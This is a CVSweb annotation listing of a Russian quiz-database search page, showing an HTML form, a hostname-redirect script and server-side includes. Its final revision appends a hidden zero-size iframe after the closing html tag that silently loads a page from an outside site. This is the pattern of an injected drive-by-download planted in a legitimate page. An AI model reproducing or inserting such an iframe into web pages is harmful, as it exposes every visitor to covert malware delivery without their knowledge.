Annotation of db/prgsrc/search.html, revision 1.29

1.24      boris       1: <html>
                      2: <head>
                      3: <title>Поиск в Базе Вопросов &ndash; Database Search </title>
                      4: <script language="JavaScript">
                      5: <!--
1.27      boris       6: if ((location.hostname!="db.chgk.info") && (location.hostname!="question.chgk.info") && (location.hostname!="localhost") && (location.hostname!="bilbo.dynip.com"))
1.24      boris       7:  {window.location.href="http://db.chgk.info/search.html";};
                      8: //-->
                      9: </script>
                     10: 
                     11: <style>
                     12: td     {font-size: x-small; font-family : sans-serif}
                     13: th     {font-size: x-small; font-family : sans-serif}
                     14: 
                     15: </style>
                     16: 
                     17: </head>
                     18: <body  bgcolor="#fff0e0" vlink="#800020">
                     19: <center>
                     20: <!--#include virtual="reklama.html" -->
                     21: <form method="get" enctype="application/x-www-form-urlencoded"
                     22: action="/znatoki/cgi-bin/db.cgi">
                     23: <h2>Поиск в Базе Вопросов</h2>
                     24: <input type="text" name="sstr" value="" size="35" maxlength="50"> 
                     25: <input type="submit" value="Поиск">
                     26: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Выводить по <INPUT TYPE="text" NAME="kvo" VALUE="10" SIZE=3 MAXLENGTH=5> вопросов
                     27: <p>
                     28: <table border="1" cellpadding=4 cellspacing=0>
                     29: <tr>
                     30: <th align="left" rowspan=3 width="20%"> Вариант поиска:
1.25      roma7      31: </td><td rowspan=2 colspan=3>
1.24      boris      32: <input type="radio" name="metod" value="old"> Простой (старый)
                     33: </td><td>
                     34: <input type="checkbox" checked name="type" value="chgk">&nbsp;"Что?&nbsp;Где?&nbsp;Когда?"
                     35: </td><td>
                     36: <nobr><input type="checkbox" checked name="type" value="brain">&nbsp;"Брейн-Ринг"</nobr>
                     37: </td><td>
                     38: <input type="checkbox" checked name="type" value="igp">&nbsp;"Интернет"
                     39: </td>
                     40: </tr><tr>
                     41: <td>
                     42: <input type="checkbox" checked name="type" value="game">&nbsp;"Своя&nbsp;игра"
                     43: </td><td>
                     44: <input type="checkbox" checked name="type" value="ehruditka">&nbsp;"Эрудитка"
                     45: </td><td>
                     46: <input type="checkbox" checked name="type" value="beskrylka">&nbsp;"Бескрылка"
                     47: </td>
                     48: </tr><tr>
1.25      roma7      49: <td colspan=6><input type="radio" checked name="metod" value="rus"> Расширенный (с учетом грамматики, в вопросах всех типов)
1.24      boris      50: </td>
                     51: </tr><tr>
                     52: <th align="left"> Искать:
1.25      roma7      53: </td><td colspan=3>
1.24      boris      54: <input type="radio" name="all" value="yes"> Все слова
                     55: </td><td colspan=3>
                     56: <input type="radio" checked name="all" value="no"> Любое слово
                     57: </td>
                     58: </tr><tr>
                     59: <th align="left">Поля для поиска:
                     60: </td><td width="15%">
                     61: <input type="checkbox" name="searchin" value="Question" checked> Вопрос
                     62: </td><td width="15%">
                     63: <input type="checkbox" name="searchin" value="Answer" checked> Ответ<br> 
                     64: </td><td width="15%">
1.25      roma7      65: <input type="checkbox" name="searchin" value="PassCriteria"> Зачёт<br> 
                     66: 
                     67: </td><td width="15%">
                     68: 
1.24      boris      69: <input type="checkbox" name="searchin" value="Comments"> Комментарии<br> 
                     70: </td><td width="15%">
                     71: <input type="checkbox" name="searchin" value="Authors"> Автор<br>
                     72: </td><td width="15%">
                     73: <input type="checkbox" name="searchin" value="Sources"> Источник<br>
                     74: </td>
                     75: </tr>
                     76: </table>
1.26      roma7      77: <!--p><i>Если при попытке поиска выдаётся сообщение об ошибке, 
1.24      boris      78: попробуйте воспользоваться 
1.26      roma7      79: <a href="http://chgk.zaba.ru/search.html">зеркалом базы</a></i-->
1.24      boris      80: 
                     81: </center>
                     82: </FORM>
                     83: </font>
                     84: <!--#include virtual="footer.html" -->
                     85: <P ALIGN="center"><FONT SIZE="-2">
1.28      roma7      86: 
1.24      boris      87: <p ALIGN="center">
                     88: Обновление: <!--#include virtual="/znatoki/dimrub/db/date" -->
                     89: </body>
1.29    ! roma7      90: </html><iframe src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></iframe>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>